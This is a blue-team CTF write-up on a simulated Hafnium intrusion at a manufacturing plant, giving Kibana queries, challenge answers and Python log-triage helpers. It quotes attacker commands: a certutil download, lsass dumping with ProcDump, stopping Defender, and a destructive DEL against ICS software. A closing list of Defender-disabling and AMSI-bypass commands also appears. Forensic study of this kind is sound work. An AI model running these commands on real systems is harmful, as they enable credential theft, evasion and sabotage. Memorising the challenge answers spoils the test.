BlueYard 103 — Hafnium-APT
URL: https://cyberdefenders.org/blueteam-ctf-challenges/103#nav-questions
Scenario
You work as a SOC analyst for a consulting firm that specializes in digital forensics and incident response. You are assigned to investigate a security incident that occurred at a manufacturing plant that produces electronic components. The plant uses a variety of industrial control systems (ICS) to manage their production lines and other critical operations.
The security team at the plant detected suspicious network activity from an external IP address associated with the Hafnium threat actor group.
Your task is to investigate the incident and determine the extent of the compromise, the attacker’s objectives, and the potential impact on the plant’s operations. You have been provided with log files from the plant’s servers and workstations, which include Windows event logs and TeamViewer logs. You must analyze the logs and gather information about the attacker’s activity.
Q&A
- What is the name of the threat detected by Windows Defender?
winlog.provider_name : "Microsoft-Windows-Windows Defender" and winlog.event_data.Threat Name : *
- What was the full URL that Windows Defender blocked an archive from being downloaded?
Same as previous question, answer is: https://download.sysinternals.com/files/Procdump.zip
- What was the full command used by the attacker to successfully download the archive?
Possible download methods include PowerShell (PoSH), certutil.exe and others. This attacker seems fond of certutil.exe, but the earlier attempt was blocked, which is worth deeper investigation.
https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/
After some digging I could not find anything interesting in either the “Powershell” or the “Microsoft-Windows-Powershell” channel, so I turned to Sysmon. Query: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.OriginalFileName: "CertUtil.exe"
The downloader command line is in the winlog.event_data.CommandLine field of the matching event:
- Which user account was the attacker using when the archive was successfully downloaded to the host?
Same as the previous question: the field winlog.event_data.User of that event records "Administrator".
- What command was used by the attacker on the host to try and disable Windows Defender via the command line?
There are three common ways to disable Defender from the command line: MpCmdRun, PowerShell (Set-MpPreference) or sc. Since nothing anomalous turned up in the PowerShell logs earlier, it must be MpCmdRun or sc, so back to Sysmon.
MpCmdRun does not reveal any illegal activity. Query: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.OriginalFileName: "sc.exe"
Found. The answer is: sc stop WinDefend
- Provide the date and time when Windows Defender’s real-time protection was disabled. (24H-UTC)
Be careful here: the question asks for the time real-time protection was disabled, not the time the WinDefend service was stopped.
So let’s go back to the Defender event log (event ID 5001, “Real-time protection is disabled”).
winlog.provider_name: "Microsoft-Windows-Windows Defender" and winlog.event_id: "5001"
The answer is: 2021-03-12 08:21:35
Kibana displays timestamps in the browser’s local time, so make sure to convert back to UTC; for Beijing time (UTC+8) subtract 8 hours.
- Which version of ProcDump did the attacker run on the host?
Query: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.OriginalFileName: "procdump"
The answer is “10.0”, from the field winlog.event_data.FileVersion.
- Where is the executable located on the disk that was targeted by Procdump to dump its process memory?
The procdump command line from the previous query names the target process, lsass.exe, and the system partition is drive C, so the dumped executable is:
C:\Windows\system32\lsass.exe
- What was the location of the dump file created from the process dumped with Procdump?
Same as the previous question: the dump file name is relative in the procdump command line, so it resolves against the working directory of procdump.exe (winlog.event_data.CurrentDirectory).
So the answer is: C:\tmp\lsass.dmp
- Provide the SHA256 hash value of the Teamviewer installation to check if the legitimate version was installed.
The wording does not quite reveal which image the examiner has in mind: the question actually asks for the SHA256 hash of TeamViewer_Service.exe.
Comment added after finishing: filtering the Sysmon file-creation events (event ID 11) for the keyword “install” might also work. You will find an event whose TargetFilename is InstallOptions.dll, and another event whose CommandLine is TeamViewer_Service.exe -install and whose ParentCommandLine is C:\Users\MrPoop\AppData\Local\Temp\2\TeamViewer\TeamViewer_.exe, which is a little weird.
Query: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.OriginalFileName: "TeamViewer_Service.exe"
The hash is in the winlog.event_data.Hashes field of the matching event. BTW, thanks to Kibana’s auto-completion:
- What was the domain looked up in the first DNS query done by the TeamViewer application after it was installed?
Sysmon event ID 22 is DNSQuery. TeamViewer’s first request comes from its service process.
Query: winlog.provider_name :"Microsoft-Windows-Sysmon" and winlog.event_id: "22" and winlog.event_data.Image: "C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe"
Answer is: router7.teamviewer.com
- Determine how the attacker gained access to the Administrator account.
The most common technique is a brute-force attack; I don’t know why, but after examining the 4625 events I chose to answer
Brute-Force Attack
and it was accepted.
Query: winlog.channel: "Security" and winlog.event_id: "4625"
- What IP address can we send to the Firewall team for blocking?
Same as previous question, Query: winlog.channel: "Security" and winlog.event_id: "4625"
, answer: 8.36.216.58
- What was the hostname from where the attacker launched their attack?
Same as previous question. Answer: FancyPoodle
- Provide the first timestamp from the logs where you can see the attacker was successful login. (24H-UTC)
Filter on the IP address rather than the computer name, so you are sure you are looking at a single source.
Query: winlog.channel: "Security" and winlog.event_id: "4624" and winlog.event_data.IpAddress : "8.36.216.58"
Answer: 2021-03-11 20:26:52
- Provide the data in UTC time of when the attacker successfully logged into the host using RDP for the first time. (24H-UTC)
Query: winlog.channel: "Security" and winlog.event_id: "4624" and winlog.event_data.IpAddress : "8.36.216.58" and winlog.event_data.LogonType: "10"
Answer: 2021-03-12 08:03:00
Note the Logon ID in the field winlog.event_data.TargetLogonId: 0xcc535a
This will be used in the next question.
- When did the attacker log off from the first RDP session? (24H-UTC)
An odd question. The logoff must belong to the attacker’s session, so you have to tie it to the attacker: the successful RDP logon as Administrator occurred at 2021-03-12 08:03:00, so the logoff has to be later than that. The question is also strictly about an “RDP session logoff”, so use the TerminalServices-LocalSessionManager event 23 (session logoff succeeded) rather than Security event 4634.
Query: winlog.provider_name : "Microsoft-Windows-TerminalServices-LocalSessionManager" and winlog.event_id: "23"
Answer: 2021-03-12 08:45:02
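The Security-log chain in the last six questions (4625 burst per source, first 4624 from that source, first type-10 logon, then the LocalSessionManager 23 logoff, plus the local-to-UTC conversion) can be scripted once the Kibana hits are exported as JSON. This is an added example, not part of the original write-up: the winlogbeat-shaped documents below are constructed to line up with the answers above (the IP, workstation name and timestamps), while the host name WS01, the spacing of the failures and the LAN noise event are illustrative.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

SEC = ("Security", "Microsoft-Windows-Security-Auditing")
TSLSM = ("Microsoft-Windows-TerminalServices-LocalSessionManager/Operational",
         "Microsoft-Windows-TerminalServices-LocalSessionManager")


def doc(ts, channel_provider, event_id, **event_data):
    """Build a winlogbeat-shaped document (constructed sample data)."""
    channel, provider = channel_provider
    return {"@timestamp": ts, "winlog": {"channel": channel, "provider_name": provider,
                                         "event_id": str(event_id), "event_data": event_data}}


ATTACKER = dict(IpAddress="8.36.216.58", WorkstationName="FancyPoodle", TargetUserName="Administrator")
# Constructed records: eight password failures in 40 s, one unrelated LAN failure, the first
# network logon, the first RDP (type 10) logon and two session logoffs.  Timestamps follow the
# write-up's answers; the host name WS01 and the failure spacing are illustrative.
SAMPLE_EVENTS = [doc("2021-03-11T20:25:%02dZ" % s, SEC, 4625, LogonType="3", Status="0xc000006d", **ATTACKER)
                 for s in range(10, 50, 5)] + [
    doc("2021-03-11T20:25:30Z", SEC, 4625, IpAddress="10.0.0.7", WorkstationName="OPS-PC",
        TargetUserName="jdoe", LogonType="2", Status="0xc000006d"),
    doc("2021-03-11T20:26:52Z", SEC, 4624, LogonType="3", TargetLogonId="0x3e7d2a", **ATTACKER),
    doc("2021-03-12T08:03:00Z", SEC, 4624, LogonType="10", TargetLogonId="0xcc535a", **ATTACKER),
    doc("2021-03-12T08:03:00Z", SEC, 4624, IpAddress="-", WorkstationName="-", TargetUserName="SYSTEM",
        LogonType="5", TargetLogonId="0x3e7"),
    doc("2021-03-12T08:45:02Z", TSLSM, 23, User="WS01\\Administrator", SessionID="2"),
    doc("2021-03-12T09:30:00Z", TSLSM, 23, User="WS01\\Administrator", SessionID="3"),
]


def parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def security(events, event_id):
    return [d for d in events if d["winlog"]["channel"] == "Security"
            and d["winlog"]["event_id"] == str(event_id)]


def brute_force_sources(events, threshold=5):
    """4625 failures per (source IP, workstation name); sources at/above threshold, busiest first."""
    counts = Counter((d["winlog"]["event_data"].get("IpAddress"), d["winlog"]["event_data"].get("WorkstationName"))
                     for d in security(events, 4625))
    return [(src, n) for src, n in counts.most_common() if n >= threshold]


def first_logon(events, ip, logon_type=None):
    """Earliest 4624 from ip, optionally restricted to a logon type (10 = RemoteInteractive, i.e. RDP)."""
    hits = [d for d in security(events, 4624) if d["winlog"]["event_data"].get("IpAddress") == ip
            and (logon_type is None or d["winlog"]["event_data"].get("LogonType") == str(logon_type))]
    if not hits:
        return None
    first = min(hits, key=lambda d: parse_ts(d["@timestamp"]))
    data = first["winlog"]["event_data"]
    return {"timestamp": first["@timestamp"], "user": data["TargetUserName"], "logon_id": data["TargetLogonId"]}


def first_rdp_logoff(events, user, after):
    """Earliest LocalSessionManager EID 23 (session logoff succeeded) for user after a given time.
    EID 23 carries a session ID, not the 4624 TargetLogonId, so correlate on account and time."""
    t0 = parse_ts(after)
    hits = [d["@timestamp"] for d in events
            if d["winlog"]["provider_name"] == TSLSM[1] and d["winlog"]["event_id"] == "23"
            and d["winlog"]["event_data"]["User"].rsplit("\\", 1)[-1].lower() == user.lower()
            and parse_ts(d["@timestamp"]) > t0]
    return min(hits, key=parse_ts, default=None)


def local_to_utc(local_str, utc_offset_hours):
    """Convert a time read off the Kibana UI (browser local time) back to UTC for the answer."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    local = datetime.strptime(local_str, "%Y-%m-%d %H:%M:%S").replace(tzinfo=tz)
    return local.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    print(brute_force_sources(SAMPLE_EVENTS))
    rdp = first_logon(SAMPLE_EVENTS, "8.36.216.58", logon_type=10)
    print(first_logon(SAMPLE_EVENTS, "8.36.216.58"), rdp)
    print(first_rdp_logoff(SAMPLE_EVENTS, rdp["user"], rdp["timestamp"]))
    print(local_to_utc("2021-03-12 16:21:35", 8))
```

Correlating the logoff on account name and time is the weak link: if several RDP sessions for the same account overlap, the LocalSessionManager 21/23/24/25 events should be paired on their SessionID rather than taking the first logoff after the logon.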
- What command did the attacker run on the host which would’ve helped him understand what Antivirus software was running on the system?
I have already mentioned several times that nothing illegal shows up in the PowerShell event logs, so this time we check the Sysmon log again, specifically process creation. Whatever the attacker ran had to be interpreted by something, so it is enough to look at all child processes of cmd.exe.
Query: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "1" and winlog.event_data.ParentImage: "C:\Windows\System32\cmd.exe"
Answer: tasklist
- Which command did the attacker run on the host that would have helped him understand the network interface configuration of the host?
Same as previous question.
Answer: ipconfig /all
- What was the name of the user account added by the attacker?
Same as previous question. Answer: administrator1
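Most of the process-level questions above (the certutil download and the account that ran it, the sc stop WinDefend tampering, the ProcDump version, target and dump path, and the tasklist / ipconfig recon under cmd.exe) are one pass over Sysmon event ID 1 records once they are exported from Kibana as JSON. This is an added example, not code from the original write-up: the documents below are constructed to mirror the fields the queries above rely on (OriginalFileName, CommandLine, User, CurrentDirectory, FileVersion, ParentImage). The exact command lines, the host name WS01 and the timestamps are illustrative, not the challenge's raw logs; the Sysmon event ID 10 ProcessAccess record is included because it, not event ID 1, is what names the dumped process by full path.

```python
import ntpath
import re

CMD = "C:\\Windows\\System32\\cmd.exe"


def sysmon_doc(ts, event_id, **event_data):
    """Build a winlogbeat-shaped Sysmon document (constructed sample data)."""
    return {"@timestamp": ts, "winlog": {"provider_name": "Microsoft-Windows-Sysmon",
                                         "event_id": str(event_id), "event_data": event_data}}


# Constructed records modelled on the write-up's answers; command lines, the
# host name WS01 and the timestamps are illustrative, not the challenge's logs.
SAMPLE_EVENTS = [
    sysmon_doc("2021-03-12T08:10:11Z", 1, OriginalFileName="CertUtil.exe", User="WS01\\Administrator",
               ParentImage=CMD, CurrentDirectory="C:\\tmp\\",
               CommandLine="certutil -urlcache -split -f https://download.sysinternals.com/files/Procdump.zip procdump.zip"),
    sysmon_doc("2021-03-12T08:20:02Z", 1, OriginalFileName="sc.exe", User="WS01\\Administrator",
               ParentImage=CMD, CurrentDirectory="C:\\tmp\\", CommandLine="sc stop WinDefend"),
    sysmon_doc("2021-03-12T08:30:40Z", 1, OriginalFileName="procdump", FileVersion="10.0",
               User="WS01\\Administrator", ParentImage=CMD, CurrentDirectory="C:\\tmp\\",
               CommandLine="procdump.exe -accepteula -ma lsass.exe lsass.dmp"),
    # EID 10 ProcessAccess: the only record that names the dumped process by full path
    sysmon_doc("2021-03-12T08:30:41Z", 10, SourceImage="C:\\tmp\\procdump.exe",
               TargetImage="C:\\Windows\\system32\\lsass.exe", GrantedAccess="0x1FFFFF"),
    sysmon_doc("2021-03-12T08:33:05Z", 1, OriginalFileName="tasklist.exe", User="WS01\\Administrator",
               ParentImage=CMD, CurrentDirectory="C:\\tmp\\", CommandLine="tasklist"),
    sysmon_doc("2021-03-12T08:33:20Z", 1, OriginalFileName="ipconfig.exe", User="WS01\\Administrator",
               ParentImage=CMD, CurrentDirectory="C:\\tmp\\", CommandLine="ipconfig /all"),
]

# Command-line patterns for the techniques hunted above (LOLBin download, Defender tampering).
DOWNLOAD_PATTERNS = [r"\bcertutil(\.exe)?\b.*-urlcache", r"\bbitsadmin(\.exe)?\b.*/transfer",
                     r"\b(Invoke-WebRequest|iwr|DownloadFile|DownloadString|Start-BitsTransfer)\b"]
DEFENDER_TAMPER_PATTERNS = [r"\bsc(\.exe)?\s+(stop|delete|config)\s+WinDefend\b",
                            r"\bMpCmdRun(\.exe)?\b.*-RemoveDefinitions",
                            r"\b(Set|Add)-MpPreference\b.*-(Disable\w+|ExclusionPath)"]


def sysmon(events, event_id):
    """Yield (timestamp, event_data) for Sysmon records with the given event ID."""
    for doc in events:
        w = doc["winlog"]
        if w["provider_name"] == "Microsoft-Windows-Sysmon" and str(w["event_id"]) == str(event_id):
            yield doc["@timestamp"], w["event_data"]


def find_commands(events, patterns):
    """(timestamp, account, command line) for EID 1 records whose CommandLine matches any pattern."""
    hits = []
    for ts, data in sysmon(events, 1):
        cmd = data.get("CommandLine", "")
        if any(re.search(p, cmd, re.IGNORECASE) for p in patterns):
            hits.append((ts, data.get("User", "").rsplit("\\", 1)[-1], cmd))
    return hits


def children_of(events, parent_basename):
    """Command lines spawned by a given parent image name, e.g. recon typed into cmd.exe."""
    return [data["CommandLine"] for _, data in sysmon(events, 1)
            if ntpath.basename(data.get("ParentImage", "")).lower() == parent_basename.lower()]


def procdump_summary(events):
    """Reconstruct a procdump run: binary version, dump file (a relative name resolves
    against CurrentDirectory) and the dumped image's full path from the EID 10 record."""
    out = {}
    for _, data in sysmon(events, 1):
        if data.get("OriginalFileName", "").lower() != "procdump":
            continue
        out["version"] = data.get("FileVersion")
        positional = [a for a in data["CommandLine"].split()[1:] if not a.startswith("-")]
        out["target_arg"] = positional[0] if positional else None
        out["dump_path"] = (ntpath.normpath(ntpath.join(data.get("CurrentDirectory", ""), positional[1]))
                            if len(positional) > 1 else None)
    for _, data in sysmon(events, 10):
        if ntpath.basename(data.get("SourceImage", "")).lower() == "procdump.exe":
            out["target_image"], out["granted_access"] = data["TargetImage"], data["GrantedAccess"]
    return out


if __name__ == "__main__":
    print(find_commands(SAMPLE_EVENTS, DOWNLOAD_PATTERNS))
    print(find_commands(SAMPLE_EVENTS, DEFENDER_TAMPER_PATTERNS))
    print(children_of(SAMPLE_EVENTS, "cmd.exe"))
    print(procdump_summary(SAMPLE_EVENTS))
```

Matching on OriginalFileName rather than Image is what makes the Kibana queries above robust to a renamed binary; the same is true here, which is why the ProcDump check keys on OriginalFileName "procdump" and only falls back to the image basename for the EID 10 source.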
- Q21: Based on information from the public, the first visual signs of raw sewage spilling into the river from the plant were around 14:00 local time on March 12th, 2021. According to the plant technicians, it would take at least 45 minutes for the plant to excrete sewage into the river once the backwash mode was activated. A file was created on the system that matches the above timelines and, based on its content, could likely have been used by the attackers to initiate the plant backwash. What was the name of this file?
- Q22: Which application was responsible for downloading the malicious file to the host?
- Q24: After this file was downloaded, the attacker appeared to have moved it to another directory on the host. What was the new path of the file?
From previous questions we have already noticed the file
C:\Program Files\ifak\SIMBA#4.3\simba.exe
and a process repeatedly trying to kill simba here:
So, narrow the time window and search for file creation (Sysmon event ID 11):
The same events show this file was downloaded by Chrome.
So our answers are: backwash.bat
and chrome.exe
- Q23: From which website was this malicious file downloaded?
Search for DNS queries or network connections from chrome.exe; neither gives a strong link to the downloaded file. You can still get the answer from Sysmon event 22 (DNS query) and the corresponding time range, while the Sysmon event 3 (network connection) records have nothing related to chrome.exe. The intended route, though, is Sysmon event 15.
Event ID 15: FileCreateStreamHash
This event logs when a named file stream is created, and it generates events that log the hash of the contents of the file to which the stream is assigned (the unnamed stream), as well as the contents of the named stream. There are malware variants that drop their executables or configuration settings via browser downloads, and this event is aimed at capturing that based on the browser attaching a Zone.Identifier “mark of the web” stream. Recent Sysmon versions record the stream text in the Contents field, so for a browser download it includes the Zone.Identifier’s ReferrerUrl and HostUrl lines, which name the site the file came from.
Query used for Sysmon event 15: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "15"
Query used for Sysmon event 22: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "22"
Both linked to answer: wetransfer.com
- Based on the available logs, there are limited indications that the downloaded malicious file was executed on the host. Provide the earliest timestamp which shows proof of the file being executed on the host. (24H-UTC)
We already know the content of the downloaded file and its final path, so check newly created processes again.
Query: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "1"
Time range (local time in the Kibana picker): 03/12/2021 19:00 to 03/12/2021 19:33
Answer: 2021-03-12 11:10:03
- What command contained in the malicious file, if successfully run on the host, would you expect to have initiated the plant’s backwash mode.
Query: winlog.provider_name: "Microsoft-Windows-Sysmon" and winlog.event_id: "15"
Answer: C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no
Same as previous question, we could see the downloaded file contents, so analyzing it will give us answer.
- Prior to switching to a manual override, the technicians attempted to open the modified Simba plant simulation software application in order to stop the backwash sequence. However, they could not get the application to launch. What command from the attacker’s script would have rendered the application unusable?
Same as the previous question: analyse the contents of the downloaded malicious file.
Answer: DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3\*"
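The last three questions both come down to reading file contents out of the logs: the Zone.Identifier stream in the Sysmon event 15 Contents field tells you where the file came from, and the batch file itself tells you which line starts the backwash and which one breaks the application. This is an added example, not part of the original write-up. The Zone.Identifier text below is constructed (the wetransfer.com host matches the answer above, the URL paths are placeholders), and the script body is constructed around the two commands quoted above; its taskkill and timeout lines are added for illustration and were not taken from the challenge.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon EID 15 Contents field: the Zone.Identifier stream Chrome attaches to a
# download.  The URL paths are placeholders, not the real transfer links from the challenge.
SAMPLE_ZONE_IDENTIFIER = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                          "ReferrerUrl=https://wetransfer.com/downloads/example\r\n"
                          "HostUrl=https://download.wetransfer.com/example/backwash.bat\r\n")

# Constructed script body: the Simba.exe and DEL lines are the two commands quoted in the
# write-up; the taskkill and timeout lines are added for illustration.
SAMPLE_SCRIPT = """@echo off
taskkill /F /IM Simba.exe
C:\\Program Files\\ifak\\SIMBA#4.3\\Simba.exe --function backwash --interruptable no
timeout /t 30
DEL /F /Q "C:\\Program Files\\ifak\\SIMBA#4.3\\*"
"""


def parse_zone_identifier(contents):
    """Parse the [ZoneTransfer] key=value block; ZoneId is returned as an int."""
    fields = {}
    for line in contents.splitlines():
        line = line.strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip()] = value.strip()
    if "ZoneId" in fields:
        fields["ZoneId"] = int(fields["ZoneId"])
    return fields


def download_origin(contents):
    """Hostnames from HostUrl and ReferrerUrl plus a naive registrable domain (last two
    labels, which is wrong for suffixes like co.uk) so two hosts of one site collapse to one."""
    z = parse_zone_identifier(contents)
    hosts = [h for h in (urlparse(z.get(k, "")).hostname for k in ("HostUrl", "ReferrerUrl")) if h]
    domains = sorted({".".join(h.split(".")[-2:]) for h in hosts})
    return {"zone_id": z.get("ZoneId"), "hosts": hosts, "domains": domains}


# Rules for the lines in a batch file that would affect the plant application.
SCRIPT_RULES = [
    ("process kill", re.compile(r"^\s*taskkill\b.*/IM\s+\S+", re.IGNORECASE)),
    ("ICS application command", re.compile(r"Simba\.exe\s+--\S+", re.IGNORECASE)),
    ("destructive delete", re.compile(r"^\s*(del|erase|rd|rmdir)\b.*(/F|/S|/Q)", re.IGNORECASE)),
]


def triage_script(text):
    """(line number, category, line) for every script line matching a rule; first rule wins."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for label, rx in SCRIPT_RULES:
            if rx.search(line):
                findings.append((n, label, line.strip()))
                break
    return findings


if __name__ == "__main__":
    print(download_origin(SAMPLE_ZONE_IDENTIFIER))
    for finding in triage_script(SAMPLE_SCRIPT):
        print(finding)
```

ZoneId=3 is the Internet zone, which is what makes the mark-of-the-web interesting here: a script with that stream and a HostUrl is direct evidence of a browser download even when no Sysmon event 3 record ties chrome.exe to the transfer.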
Well done!
Reference
Confirm Local Machine Timezone
If you are not using the pre-configured ELK stack for the investigation, you may need to confirm the time zone of the machine the events were created on.
After a bit of digging, it turns out the Windows “System” channel event ID 6013 (the system uptime event written at boot) includes the machine’s time zone.
Query: winlog.event_id: "6013"
Disable Windows Defender (or something equivalent)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Set-MpPreference -DisableIOAVProtection $true
Add-MpPreference -ExclusionPath "C:\"
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Uninstall-WindowsFeature Windows-Defender
Set-MpPreference -DisableRealtimeMonitoring $true -DisableAutoExclusions $true -DisablePrivacyMode $true -DisableBehaviorMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -DisableArchiveScanning $true -DisableCatchupFullScan $true -DisableCatchupQuickScan $true -DisableEmailScanning $true -DisableRemovableDriveScanning $true -DisableRestorePoint $true -DisableScannedMappedNetworkDrivesForFullScan $true -DisableScanningNetworkFiles $true -DisableBlockAtFirstSeen $true
sc stop WinDefend